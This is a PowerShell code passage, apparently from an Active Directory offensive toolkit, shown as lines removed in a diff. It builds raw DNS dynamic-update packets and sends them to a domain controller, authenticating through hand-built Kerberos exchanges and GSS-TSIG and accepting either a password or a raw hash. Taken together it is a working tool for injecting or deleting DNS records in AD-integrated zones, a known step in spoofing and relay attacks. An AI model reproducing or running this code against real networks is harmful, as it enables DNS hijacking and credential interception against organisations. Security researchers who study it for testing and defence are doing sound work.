- }
-
- function New-RandomByteArray
- {
- param([Int]$length,[Int]$minimum=1,[Int]$maximum=255)
-
- [String]$random = [String](1..$length | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum $minimum -Maximum $maximum)})
- [Byte[]]$random = $random.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
- return $random
- }
-
- function New-DNSNameArray
- {
- param([String]$name)
-
- $character_array = $name.ToCharArray()
- [Array]$index_array = 0..($character_array.Count - 1) | Where-Object {$character_array[$_] -eq '.'}
-
- if($index_array.Count -gt 0)
- {
-
- $name_start = 0
-
- ForEach ($index in $index_array)
- {
- $name_end = $index - $name_start
- [Byte[]]$name_array += $name_end
- [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start,$name_end))
- $name_start = $index + 1
- }
-
- [Byte[]]$name_array += ($name.Length - $name_start)
- [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
- }
- else
- {
- [Byte[]]$name_array = $name.Length
- [Byte[]]$name_array += [System.Text.Encoding]::UTF8.GetBytes($name.Substring($name_start))
- }
-
- return $name_array
- }
-
- function New-PacketDNSQuery
- {
- param([Byte[]]$name,[byte[]]$type,[Byte[]]$apreq)
-
- [Byte[]]$transaction_id = New-RandomByteArray 2
-
- if($apreq)
- {
- $mechtoken_length = Get-ASN1LengthArrayLong ($apreq.Count)
- $mechtoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + 1)
- $innercontexttoken_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + 17) # 31
- $innercontexttoken_length2 = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
- $innercontexttoken_length.Count + 18)
- $spnego_length = Get-ASN1LengthArrayLong ($apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count +
- $innercontexttoken_length.Count + $innercontexttoken_length2.Count + 27)
- $grouped_length = $apreq.Count + $mechtoken_length.Count + $mechtoken_length2.Count + $innercontexttoken_length.Count +
- $innercontexttoken_length2.Count + $spnego_length.Count + 25
- $key_size = [System.BitConverter]::GetBytes($grouped_length + 3)[1,0]
- $rd_length = [System.BitConverter]::GetBytes($grouped_length + $key_size.Count + 27)[1,0]
- $inception = [int64](([datetime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
- $inception = [System.BitConverter]::GetBytes($inception)
- $inception = $inception[3..0]
- }
-
- if($apreq)
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($grouped_length + $name.Count + 57)[1,0]
- }
- else
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($name.Count + 16)[1,0]
- }
-
- $packet_DNSQuery = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_DNSQuery.Add("Length",$length)
- $packet_DNSQuery.Add("TransactionID",$transaction_ID)
- $packet_DNSQuery.Add("Flags",[Byte[]](0x00,0x00))
- $packet_DNSQuery.Add("Questions",[Byte[]](0x00,0x01))
- $packet_DNSQuery.Add("AnswerRRs",[Byte[]](0x00,0x00))
- $packet_DNSQuery.Add("AuthorityRRs",[Byte[]](0x00,0x00))
-
- if($apreq)
- {
- $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x01))
- }
- else
- {
- $packet_DNSQuery.Add("AdditionalRRs",[Byte[]](0x00,0x00))
- }
-
- $packet_DNSQuery.Add("Queries_Name",$name)
- $packet_DNSQuery.Add("Queries_Type",$type)
- $packet_DNSQuery.Add("Queries_Class",[Byte[]](0x00,0xff))
-
- if($apreq)
- {
- $packet_DNSQuery.Add("Queries_AdditionalRecords_Name",[Byte[]](0xc0,0x0c))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_Type",[Byte[]](0x00,0xf9))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_Class",[Byte[]](0x00,0xff))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RDLength",$rd_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Algorithm",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Inception",$inception)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Expiration",$inception)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Mode",[Byte[]](0x00,0x03))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_Error",[Byte[]](0x00,0x00))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_KeySize",$key_size)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_Encoding",[Byte[]](0x60) + $spnego_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_ThisMech",[Byte[]](0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_Encoding",[Byte[]](0xa0) + $innercontexttoken_length2 + [Byte[]](0x30) +
- $innercontexttoken_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechTypes_Encoding",[Byte[]](0xa0,0x0d,0x30,0x0b))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechType0",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Encoding",[Byte[]](0xa2) + $mechtoken_length2 + [Byte[]](0x04) +
- $mechtoken_length)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_SPNego_InnerContextToken_MechToken_Token",$apreq)
- $packet_DNSQuery.Add("Queries_AdditionalRecords_RData_OtherSize",[Byte[]](0x00,0x00))
- }
-
- return $packet_DNSQuery
- }
-
- function New-PacketDNSUpdate
- {
- param([Byte[]]$transaction_ID,[String]$zone,[String]$name,[String]$type,[Int]$TTL,[Int]$preference,[Int]$priority,[Int]$weight,[Int]$port,[String]$data,[Byte[]]$time_signed,[Byte[]]$tkey_name,[Byte[]]$MAC)
-
- if($data)
- {
- $add = $true
- [Byte[]]$class = 0x00,0x01
- }
- else
- {
- [Byte[]]$class = 0x00,0xff
- $TTL = 0
- }
-
- switch ($type)
- {
-
- 'A'
- {
- [Byte[]]$type = 0x00,0x01
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
- }
- elseif($data)
- {
- [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
- }
-
- }
-
- 'AAAA'
- {
- [Byte[]]$type = 0x00,0x1c
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = ([System.Net.IPAddress][String]([System.Net.IPAddress]$data)).GetAddressBytes()
- }
- elseif($data)
- {
- [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
- }
-
- }
-
- 'CNAME'
- {
- [Byte[]]$type = 0x00,0x05
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
- elseif($data)
- {
- [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
- }
-
- }
-
- 'MX'
- {
- $MX = $true
- [Byte[]]$type = 0x00,0x0f
-
- if($data)
- {
- $extra_length = 2
- [Byte[]]$preference = [System.Bitconverter]::GetBytes($preference)[1,0]
- }
-
- if($data -and [Bool]($data -as [System.Net.IPAddress]))
- {
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
- elseif($data)
- {
- [Byte[]]$data = (New-DNSNameArray ($data -replace ('.' + $zone),'')) + 0xc0,0x0c
- }
-
- }
-
- 'PTR'
- {
- [Byte[]]$type = 0x00,0x0c
-
- if($data)
- {
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
-
- }
-
- 'SRV'
- {
- $SRV = $true
- [Byte[]]$type = 0x00,0x21
-
- if($data)
- {
- [Byte[]]$priority = [System.Bitconverter]::GetBytes($priority)[1,0]
- [Byte[]]$weight = [System.Bitconverter]::GetBytes($weight)[1,0]
- [Byte[]]$port = [System.Bitconverter]::GetBytes($port)[1,0]
- $extra_length = 6
- [Byte[]]$data = (New-DNSNameArray $data) + 0x00
- }
-
- }
-
- 'TXT'
- {
- $TXT = $true
- [Byte[]]$type = 0x00,0x10
- [Byte[]]$TXT_length = [System.BitConverter]::GetBytes($data.Length)[0]
-
- if($data)
- {
- $extra_length = 1
- [Byte[]]$data = [System.Text.Encoding]::UTF8.GetBytes($data)
- }
-
- }
-
- }
-
- if($name -eq $zone)
- {
- [Byte[]]$name = 0xc0,0x0c
- }
- else
- {
- [Byte[]]$name = (New-DNSNameArray ($name -replace ('.' + $zone),'')) + 0xc0,0x0c
- #[Byte[]]$name = (New-DNSNameArray $name) + 0x00
- }
-
- [Byte[]]$zone = (New-DNSNameArray $zone) + 0x00
- [Byte[]]$TTL = [System.Bitconverter]::GetBytes($TTL)[3..0]
- [Byte[]]$data_length = [System.BitConverter]::GetBytes($data.Length + $extra_length)[1,0]
-
- if($MAC)
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + $tkey_name.Count + $MAC.Count + 62 + $extra_length)[1,0]
- }
- elseif(!$tkey_name)
- {
- [Byte[]]$length = [System.BitConverter]::GetBytes($zone.Count + $name.Count + $data.Length + 26 + $extra_length)[1,0]
- }
-
- $packet_DNSUpdate = New-Object System.Collections.Specialized.OrderedDictionary
-
- if(!$tkey_name -or $MAC)
- {
- $packet_DNSUpdate.Add("Length",$length)
- }
-
- $packet_DNSUpdate.Add("TransactionID",$transaction_ID)
- $packet_DNSUpdate.Add("Flags",[Byte[]](0x28,0x00))
- $packet_DNSUpdate.Add("Zones",[Byte[]](0x00,0x01))
- $packet_DNSUpdate.Add("Prerequisites",[Byte[]](0x00,0x00))
- $packet_DNSUpdate.Add("Updates",[Byte[]](0x00,0x01))
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRRs",[Byte[]](0x00,0x01))
- }
- else
- {
- $packet_DNSUpdate.Add("AdditiionalRRs",[Byte[]](0x00,0x00))
- }
-
- $packet_DNSUpdate.Add("Zone_Name",$zone)
- $packet_DNSUpdate.Add("Zone_Type",[Byte[]](0x00,0x06))
- $packet_DNSUpdate.Add("Zone_Class",[Byte[]](0x00,0x01))
- $packet_DNSUpdate.Add("Updates_Name",$name)
- $packet_DNSUpdate.Add("Updates_Type",$type)
- $packet_DNSUpdate.Add("Updates_Class",$class)
- $packet_DNSUpdate.Add("Updates_TTL",$TTL)
- $packet_DNSUpdate.Add("Updates_DataLength",$data_length)
-
- if($MX)
- {
- $packet_DNSUpdate.Add("Updates_TXTLength",$preference)
- }
-
- if($TXT -and $add)
- {
- $packet_DNSUpdate.Add("Updates_TXTLength",$TXT_length)
- }
-
- if($SRV -and $add)
- {
- $packet_DNSUpdate.Add("Updates_Priority",$priority)
- $packet_DNSUpdate.Add("Updates_Weight",$weight)
- $packet_DNSUpdate.Add("Updates_Port",$port)
- }
-
- if($add)
- {
- $packet_DNSUpdate.Add("Updates_Address",$data)
- }
-
- if($tkey_name)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_Name",$tkey_name)
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_Type",[Byte[]](0x00,0xfa))
- }
-
- $packet_DNSUpdate.Add("AdditionalRecords_Class",[Byte[]](0x00,0xff))
- $packet_DNSUpdate.Add("AdditionalRecords_TTL",[Byte[]](0x00,0x00,0x00,0x00))
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_DataLength",[Byte[]](0x00,0x36))
- }
-
- $packet_DNSUpdate.Add("AdditionalRecords_AlgorithmName",[Byte[]](0x08,0x67,0x73,0x73,0x2d,0x74,0x73,0x69,0x67,0x00))
- $packet_DNSUpdate.Add("AdditionalRecords_TimeSigned",$time_signed)
- $packet_DNSUpdate.Add("AdditionalRecords_Fudge",[Byte[]](0x01,0x2c))
-
- if($MAC)
- {
- $packet_DNSUpdate.Add("AdditionalRecords_MACSize",[Byte[]](0x00,0x1c))
- $packet_DNSUpdate.Add("AdditionalRecords_MAC",$MAC)
- $packet_DNSUpdate.Add("AdditionalRecords_OriginalID",$transaction_ID)
- }
-
- $packet_DNSUpdate.Add("AdditionalRecords_Error",[Byte[]](0x00,0x00))
- $packet_DNSUpdate.Add("AdditionalRecords_OtherLength",[Byte[]](0x00,0x00))
- }
-
- return $packet_DNSUpdate
- }
-
- function New-PacketDNSUpdateMAC
- {
- param([Byte[]]$flags,[Byte[]]$sequence_number,[Byte[]]$checksum)
-
- $packet_DNSUpdateMAC = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_TokenID",[Byte[]](0x04,0x04))
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Flags",$flags)
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Filler",[Byte[]](0xff,0xff,0xff,0xff,0xff))
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_SequenceNumber",[Byte[]](0x00,0x00,0x00,0x00) + $sequence_number)
-
- if($checksum)
- {
- $packet_DNSUpdateMAC.Add("DNSUpdateMAC_Checksum",$checksum)
- }
-
- return $packet_DNSUpdateMAC
- }
-
- function Get-DNSUpdateResponseStatus
- {
- param([Byte[]]$DNS_client_receive)
-
- $DNS_response_flags = [System.BitConverter]::ToString($DNS_client_receive[4..5])
- $DNS_response_flags = $DNS_response_flags -replace "-",""
-
- switch ($DNS_response_flags)
- {
- 'A800' {$DNS_update_response_status = "[+] DNS update successful"}
- 'A801' {$DNS_update_response_status = ("[-] format error 0x" + $DNS_response_flags)}
- 'A802' {$DNS_update_response_status = ("[-] failed to complete 0x" + $DNS_response_flags)}
- 'A804' {$DNS_update_response_status = ("[-] not implemented 0x" + $DNS_response_flags)}
- 'A805' {$DNS_update_response_status = ("[-] update refused 0x" + $DNS_response_flags)}
- Default {$DNS_update_response_status = ("[-] DNS update was not successful 0x" + $DNS_response_flags)}
- }
-
- return $DNS_update_response_status
- }
-
- $DNS_client = New-Object System.Net.Sockets.TCPClient
- $DNS_client.Client.ReceiveTimeout = 3000
-
- if($Security -ne 'Secure')
- {
-
- try
- {
- $DNS_client.Connect($DomainController,"53")
- }
- catch
- {
- Write-Output "$DomainController did not respond on TCP port 53"
- }
-
- if($DNS_client.Connected)
- {
- $DNS_client_stream = $DNS_client.GetStream()
- $DNS_client_receive = New-Object System.Byte[] 2048
- [Byte[]]$transaction_id = New-RandomByteArray 2
- $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData
- [Byte[]]$DNSUpdate = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
- $DNS_client_send = $DNSUpdate
- $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
- $DNS_client_stream.Flush()
- $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
- $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
- Write-Output $DNS_update_response_status
- $DNS_client.Close()
- $DNS_client_stream.Close()
- }
-
- }
-
- if($Security -eq 'Secure' -or ($Security -eq 'Auto' -and $DNS_update_response_status -like '*0xA805'))
- {
- $tkey = "6" + ((0..9) | Get-Random -Count 2) + "-ms-7.1-" + ((0..9) | Get-Random -Count 4) + "." + ((0..9) | Get-Random -Count 8) +
- "-" + ((0..9) | Get-Random -Count 4) + "-11e7-" + ((0..9) | Get-Random -Count 4) + "-000c296694e0"
- $tkey = $tkey -replace " ",""
- Write-Verbose "[+] TKEY name $tkey"
- [Byte[]]$tkey_name = [System.Text.Encoding]::UTF8.GetBytes($tkey)
- $tkey_name = [Byte[]]0x08 + $tkey_name + 0x00
- $tkey_name[9] = 0x06
- $tkey_name[16] = 0x24
-
- if($kerberos_tcpclient)
- {
- $kerberos_client = New-Object System.Net.Sockets.TCPClient
- $kerberos_client.Client.ReceiveTimeout = 3000
- $domain_controller = [System.Text.Encoding]::UTF8.GetBytes($DomainController)
- $kerberos_username = [System.Text.Encoding]::UTF8.GetBytes($Username)
- $kerberos_realm = [System.Text.Encoding]::UTF8.GetBytes($Realm)
-
- try
- {
- $kerberos_client.Connect($DomainController,"88")
- }
- catch
- {
- Write-Output "$DomainController did not respond on TCP port 88"
- }
-
- }
-
- if(!$kerberos_tcpclient -or $kerberos_client.Connected)
- {
-
- if($kerberos_tcpclient)
- {
-
- if($Hash)
- {
- $base_key = (&{for ($i = 0;$i -lt $hash.Length;$i += 2){$hash.SubString($i,2)}}) -join "-"
- $base_key = $base_key.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- }
- else
- {
- $base_key = Get-KerberosAES256BaseKey $salt $password
- }
-
- $ke_key = Get-KerberosAES256UsageKey encrypt 1 $base_key
- $ki_key = Get-KerberosAES256UsageKey integrity 1 $base_key
- $nonce = New-RandomByteArray 4
- $kerberos_client_stream = $kerberos_client.GetStream()
- $kerberos_client_receive = New-Object System.Byte[] 2048
- $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce
- $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
- $kerberos_client_send = $AS_REQ
- $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
- $kerberos_client_stream.Flush()
- $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
- [Byte[]]$PAC_Timestamp = New-KerberosPACTimestamp $ke_key
- [Byte[]]$PAC_ENC_Timestamp = Protect-KerberosAES256CTS $ke_key $PAC_Timestamp
- [Byte[]]$PAC_Timestamp_Signature = Get-KerberosHMACSHA1 $ki_key $PAC_Timestamp
- $packet_AS_REQ = New-PacketKerberosASREQ $kerberos_username $kerberos_realm $domain_controller $nonce $PAC_ENC_Timestamp $PAC_Timestamp_Signature
- $AS_REQ = ConvertFrom-PacketOrderedDictionary $packet_AS_REQ
- $kerberos_client_send = $AS_REQ
- $kerberos_client_stream.Write($kerberos_client_send,0,$kerberos_client_send.Length) > $null
- $kerberos_client_stream.Flush()
- $kerberos_client_stream.Read($kerberos_client_receive,0,$kerberos_client_receive.Length) > $null
- $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
- $asrep_payload = $asrep_payload -replace "-",""
- $kerberos_client.Close()
- $kerberos_client_stream.Close()
- }
- else
- {
-
- try
- {
-
- $Null = [System.Reflection.Assembly]::LoadWithPartialName("System.IdentityModel")
-
- if($username)
- {
- $creds = New-Object System.Management.Automation.PSCredential ($username,$Password)
- $network_creds = $creds.GetNetworkCredential()
- $network_creds.Domain = $domain
- $token = New-Object System.IdentityModel.Selectors.KerberosSecurityTokenProvider ("DNS/$DomainController",[System.Security.Principal.TokenImpersonationLevel]::Impersonation,$network_creds)
- $ticket = $token.GetToken([System.TimeSpan]::FromMinutes(1))
- }
- else
- {
- $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ("DNS/$DomainController")
- }
-
- $asrep_key = $ticket.SecurityKey.GetSymmetricKey()
- $kerberos_client_receive = $Ticket.GetRequest()
- $asrep_payload = [System.BitConverter]::ToString($kerberos_client_receive)
- $asrep_payload = $asrep_payload -replace "-",""
- }
- catch
- {
- $auth_success = $false
- }
-
- }
-
- if($asrep_key -or ($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302010B*'))
- {
- Write-Verbose "[+] Kerberos preauthentication successful"
- $auth_success = $true
- }
- elseif($asrep_payload.Length -gt 0 -and $asrep_payload -like '*A003020105A10302011E*')
- {
- Write-Output ("[-] Kerberos preauthentication error 0x" + $asrep_payload.Substring(96,2))
- $auth_success = $false
- }
- else
- {
- Write-Output "[-] Kerberos authentication failure"
- $auth_success = $false
- }
-
- if($auth_success)
- {
- $ticket_index = $asrep_payload.IndexOf("A003020112A1030201")
- $ticket_kvno = $kerberos_client_receive[($ticket_index / 2 + 9)]
-
- if($asrep_payload.Substring($ticket_index + 22,2) -eq '82')
- {
- $ticket_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($ticket_index / 2 + 13)..($ticket_index / 2 + 12)],0)) - 4
- }
- else
- {
- $ticket_length = $kerberos_client_receive[($ticket_index / 2 + 12)] - 3
- }
-
- $ticket = $Kerberos_client_receive[($ticket_index / 2 + 18)..($ticket_index/2 + 17 + $ticket_length)]
-
- if($kerberos_tcpclient)
- {
- $cipher_index = $asrep_payload.Substring($ticket_index + 1).IndexOf("A003020112A1030201") + $ticket_index + 1
-
- if($asrep_payload.Substring($cipher_index + 22,2) -eq '82')
- {
- $cipher_length = ([System.BitConverter]::ToUInt16($kerberos_client_receive[($cipher_index / 2 + 13)..($cipher_index / 2 + 12)],0)) - 4
- }
- else
- {
- $cipher_length = $kerberos_client_receive[($cipher_length / 2 + 12)] - 3
- }
-
- $cipher = $kerberos_client_receive[($cipher_index / 2 + 18)..($cipher_index / 2 + 17 + $cipher_length)]
- $ke_key = Get-KerberosAES256UsageKey encrypt 3 $base_key
- $asrep_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
- $kerberos_session_key = $asrep_cleartext[37..68]
- $ke_key = Get-KerberosAES256UsageKey encrypt 11 $kerberos_session_key
- $ki_key = Get-KerberosAES256UsageKey integrity 11 $kerberos_session_key
- [Byte[]]$subkey = New-RandomByteArray 32
- [Byte[]]$sequence_number = New-RandomByteArray 4
- $packet_authenticator = New-KerberosAuthenticator $kerberos_realm $kerberos_username $subkey $sequence_number
- [Byte[]]$authenticator = ConvertFrom-PacketOrderedDictionary $packet_authenticator
- $authenticator = (New-RandomByteArray 16) + $authenticator
- $authenticator_encrypted = Protect-KerberosAES256CTS $ke_key $authenticator
- $authenticator_signature = Get-KerberosHMACSHA1 $ki_key $authenticator
- $packet_apreq = New-PacketKerberosAPREQ $kerberos_realm $domain_controller $ticket_kvno $ticket $authenticator_encrypted $authenticator_signature
- [Byte[]]$apreq = ConvertFrom-PacketOrderedDictionary $packet_apreq
- [Byte[]]$mac_flags = 0x04
- }
- else
- {
- [Byte[]]$apreq = $kerberos_client_receive
- [Byte[]]$mac_flags = 0x00
- }
-
- $packet_DNSQuery = New-PacketDNSQuery $tkey_name 0x00,0xf9 $apreq
- $DNSQueryTKEY = ConvertFrom-PacketOrderedDictionary $packet_DNSQuery
- $DNS_client = New-Object System.Net.Sockets.TCPClient
- $DNS_client.Client.ReceiveTimeout = 3000
-
- try
- {
- $DNS_client.Connect($DomainController,"53")
- }
- catch
- {
- Write-Output "$DomainController did not respond on TCP port 53"
- }
-
- if($DNS_client.Connected)
- {
- $DNS_client_stream = $DNS_client.GetStream()
- $DNS_client_receive = New-Object System.Byte[] 2048
- $DNS_client_send = $DNSQueryTKEY
- $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
- $DNS_client_stream.Flush()
- $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
- $tkey_payload = [System.BitConverter]::ToString($DNS_client_receive)
- $tkey_payload = $tkey_payload -replace "-",""
-
- if($tkey_payload.Substring(8,4) -eq '8000')
- {
- Write-Verbose "[+] Kerberos TKEY query successful"
- $TKEY_success = $true
- }
- else
- {
- Write-Output ("[-] Kerberos TKEY query error 0x" + $tkey_payload.Substring(8,4))
- $TKEY_success = $false
- }
-
- if($TKEY_success)
- {
-
- if($kerberos_tcpclient)
- {
- $cipher_index = $tkey_payload.IndexOf("A003020112A2")
- $cipher_length = $DNS_client_receive[($cipher_index / 2 + 8)]
- $cipher = $DNS_client_receive[($cipher_index / 2 + 9)..($cipher_index / 2 + 8 + $cipher_length)]
- $ke_key = Get-KerberosAES256UsageKey encrypt 12 $kerberos_session_key
- $tkey_cleartext = Unprotect-KerberosASREP $ke_key $cipher[0..($cipher.Count - 13)]
- $acceptor_subkey = $tkey_cleartext[59..90]
- }
- else
- {
- $sequence_index = $tkey_payload.IndexOf("FFFFFFFFFF00000000")
- $sequence_number = $DNS_client_receive[($sequence_index / 2 + 9)..($sequence_index / 2 + 12)]
- $acceptor_subkey = $asrep_key
- }
-
- $kc_key = Get-KerberosAES256UsageKey checksum 25 $acceptor_subkey
- $time_signed = [Int](([DateTime]::UtcNow)-(Get-Date "1/1/1970")).TotalSeconds
- $time_signed = [System.BitConverter]::GetBytes($time_signed)
- $time_signed = 0x00,0x00 + $time_signed[3..0]
- [Byte[]]$transaction_id = New-RandomByteArray 2
- $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name
- [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
- $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number
- [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
- $DNSUpdateTSIG += $DNSUpdateMAC
- $checksum = Get-KerberosHMACSHA1 $kc_key $DNSUpdateTSIG
- $packet_DNSUpdateMAC = New-PacketDNSUpdateMAC $mac_flags $sequence_number $checksum
- [Byte[]]$DNSUpdateMAC = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdateMAC
- $packet_DNSUpdate = New-PacketDNSUpdate $transaction_ID $DNSZone $DNSName $DNSType $DNSTTL $DNSPreference $DNSPriority $DNSWeight $DNSPort $DNSData $time_signed $tkey_name $DNSUpdateMAC
- [Byte[]]$DNSUpdateTSIG = ConvertFrom-PacketOrderedDictionary $packet_DNSUpdate
- $DNS_client_send = $DNSUpdateTSIG
- $DNS_client_stream.Write($DNS_client_send,0,$DNS_client_send.Length) > $null
- $DNS_client_stream.Flush()
- $DNS_client_stream.Read($DNS_client_receive,0,$DNS_client_receive.Length) > $null
- $DNS_update_response_status = Get-DNSUpdateResponseStatus $DNS_client_receive
- Write-Output $DNS_update_response_status
- $DNS_client.Close()
- $DNS_client_stream.Close()
- }
-
- }
-
- }
-
- }
-
- }
-
-}